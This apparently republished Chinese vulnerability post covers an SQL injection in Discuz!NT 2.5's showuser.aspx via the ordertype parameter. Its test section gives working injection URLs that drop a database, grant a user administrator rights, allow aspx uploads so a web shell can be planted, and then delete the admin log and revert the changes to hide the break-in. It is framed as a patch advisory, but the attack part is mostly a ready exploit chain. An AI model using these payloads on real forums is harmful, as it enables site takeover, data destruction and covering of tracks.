Discuz!NT 2.5最新重大漏洞

來源:互聯網
上載者:User

     正在使用Discuz!NT 2.5或剛升級到Discuz!NT 2.5論壇版本的使用者需要關注一下本文的內容,及時到官方網站尋找解決方案.

  漏洞說明:Discuz!NT 2.5 是康盛創想(北京)科技有限公司旗下的一款功能強大的基於 ASP.net 平台的社區軟體。基於先進的 .Net Framework,預設支援 SQLServer資料庫,可擴充支援Access、MySQL等多種資料庫,支援IIS5、IIS6、IIS7,安全高效、穩定易用,充分發揮 ASP.net 特性,支援自由選擇切換皮膚,支援多種其它論壇的資料轉換。

  Discuz!NT 2.5 強化論壇功能,提高速度和穩定性,負載能力也有顯著改善,在此基礎上還將提供包括商品交易、空間、相簿等強大功能的外掛程式包,供使用者自由選擇安裝,體現出強大的伸縮擴充性。無論是從功能、效能,還是從支援環境等角度來看,都是目前最為完善和成熟 ASP.net 社區軟體。但是ISTO成員在其中發現了一個安全性漏洞,成功利用此漏洞可以直接修改管理員的密碼進入後台,取得管理員權限,從而控制整個網站。

  漏洞廠商:http://www.comsenz.com

  漏洞解析:在 Discuz!NT 2.5(20080826更新前)版本中showuser.aspx頁面由於對ordertype變數沒處理好!導致SQL注入,惡意攻擊使用者甚至不用註冊賬戶,只要精心構造ordertype即可利用此漏洞。

  漏洞測試:

  http://www.*.com/bbs/showuser.aspx?ordertype=desc;drop database kj;–

  http://www.*.com/bbs/showuser.aspx?ordertype=desc;update dnt_users set adminid=’1′,groupid=’1′ where username=’webtets’;–//更新為管理員

  http://www.*.com/bbs/showuser.aspx?ordertype=desc;update dnt_attachtypes set extension=’aspx’ where extension=’jpg’;– //更新為aspx可上傳

  得到SHELL後…

  http://www.*.com/bbs/showuser.aspx?ordertype=desc;update dnt_attachtypes set extension=’jpg’ where extension=’aspx’;– //更新回JPG

  http://www.*.com/bbs/showuser.aspx?ordertype=desc;delete from dnt_adminvisitlog where username=’webtets’;– //刪除日誌

  http://www.*.com/bbs/showuser.aspx?ordertype=desc;update dnt_users set adminid=”,groupid=” where username=’webtets’;–//取消管理員

 



相關文章

Beyond APAC's No.1 Cloud

19.6% IaaS Market Share in Asia Pacific - Gartner IT Service report, 2018

Learn more >

Apsara Conference 2019

The Rise of Data Intelligence, September 25th - 27th, Hangzhou, China

Learn more >

Alibaba Cloud Free Trial

Learn and experience the power of Alibaba Cloud with a free trial worth $300-1200 USD

Learn more >

聯繫我們

該頁面正文內容均來源於網絡整理,並不代表阿里雲官方的觀點,該頁面所提到的產品和服務也與阿里云無關,如果該頁面內容對您造成了困擾,歡迎寫郵件給我們,收到郵件我們將在5個工作日內處理。

如果您發現本社區中有涉嫌抄襲的內容,歡迎發送郵件至: info-contact@alibabacloud.com 進行舉報並提供相關證據,工作人員會在 5 個工作天內聯絡您,一經查實,本站將立刻刪除涉嫌侵權內容。